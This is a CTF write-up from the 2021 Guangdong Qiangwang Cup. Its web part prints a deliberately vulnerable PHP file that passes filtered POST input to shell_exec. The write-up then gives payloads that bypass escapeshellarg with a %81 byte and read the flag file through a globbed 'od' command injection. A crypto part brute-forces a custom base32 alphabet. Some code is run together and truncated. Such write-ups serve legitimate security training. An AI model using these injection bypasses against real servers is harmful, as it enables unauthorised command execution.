2021广东强网杯｜WEB及Crypto方向WP

<?phperror_reporting(0);highlight_file(__FILE__);$dir = 'sandbox/' . md5($_SERVER['REMOTE_ADDR']) . '/';if(!file_exists($dir)){mkdir($dir);}function DefenderBonus($Pokemon){if(preg_match("/'||_|\$|;|l|s|flag|a|t|m|r|e|j|k|n|w|i|\\|p|h|u|v|\+|\^|`|~|||"|<|>|=|{|}|!|&|*|?|(|)/i",$Pokemon)){die('catch broken Pokemon! mew-_-two');}else{return $Pokemon;}}function ghostpokemon($Pokemon){if(is_array($Pokemon)){foreach ($Pokemon as $key => $pks) {$Pokemon[$key] = DefenderBonus($pks);}}else{$Pokemon = DefenderBonus($Pokemon);}}switch($_POST['myfavorite'] ?? ""){case 'picacu!':echo md5('picacu!').md5($_SERVER['REMOTE_ADDR']);break;case 'bulbasaur!':echo md5('miaowa!').md5($_SERVER['REMOTE_ADDR']);$level = $_POST["levelup"] ?? "";if ((!preg_match('/lv100/i',$level)) &&(preg_match('/lv100/i',escapeshellarg($level)))){echo file_get_contents('./hint.php');}break;case 'squirtle':echo md5('jienijieni!').md5($_SERVER['REMOTE_ADDR']);break;case 'mewtwo':$dream = $_POST["dream"] ?? "";if(strlen($dream)>=20){die("So Big Pokenmon!");}ghostpokemon($dream);echo shell_exec($dream);}?>

if ((!preg_match('/lv100/i',$level)) &&(preg_match('/lv100/i',escapeshellarg($level))))
escapeshellarg处理后 ASCII 大于 %80的字符会被过滤
myfavorite=bulbasaur%1 21&levelup=lv%81100
2f4850466af6a0a50752be95d64c997672baa2980ee888c9daa9d389227c3724<?php$hint = 'flag is located in / , and NAME IS FLAG';

```myfavorite=mewtwo&dream=od%09/F[@-Z][@-Z]G```
```0000000 066146 063541 050173 070150 051137 031543 030537 057563 0000020 031526 074522 041537 030060 057461 072502 057564 057511 0000040 030154 031566 050137 065557 066545 067157 076576 000012 0000057```

```dump = "0000000 066146 063541 050173 070150 051137 031543 030537 057563 0000020 031526 074522 041537 030060 057461 072502 057564 057511 0000040 030154 031566 050137 065557 066545 067157 076576 000012 0000057"octs = [("0o" + n) for n in  dump.split(" ") if n]hexs = [int(n, 8) for n in octs]result = ""for n in hexs:    if (len(hex(n)) > 4):        swapped = hex(((n << 8) | (n >> 8)) & 0xFFFF)        result += swapped[2:].zfill(4)print(bytes.fromhex(result).decode())```

BASE:"GHI45FQRSCX****UVWJK67DELMNOPAB3"flag{TCMDIEOH2MJFBLKHT2J7BLYZ2WUE5NYR2HNG====}

import base64STANDARD_ALPHABET = b'ABCDEFGHIJKLMNOPQRSTUVWXYZ234567'list = 'TYZ2'for i in list:for j in list:for p in list:for q in list:answer = i+j+p+qLIST = 'GHI45FQRSCX'+answer+'UVWJK67DELMNOPAB3'CUSTOM_ALPHABET = bytes(LIST, encoding="utf8")ENCODE_TRANS = bytes.maketrans(STANDARD_ALPHABET, CUSTOM_ALPDECODE_TRANS = bytes.maketrans(CUSTOM_ALPHABET, STANDARD_ALPdef encode(input):return base64.b32encode(input).translate(ENCODE_TRANS)def decode(input):return base64.b32decode(input.translate(DECODE_TRANS))flag = (decode(b'TCMDIEOH2MJFBLKHT2J7BLYZ2WUE5NYR2HNG===='))#print(flag)if b'rsa_and_base'in flag:print(flag)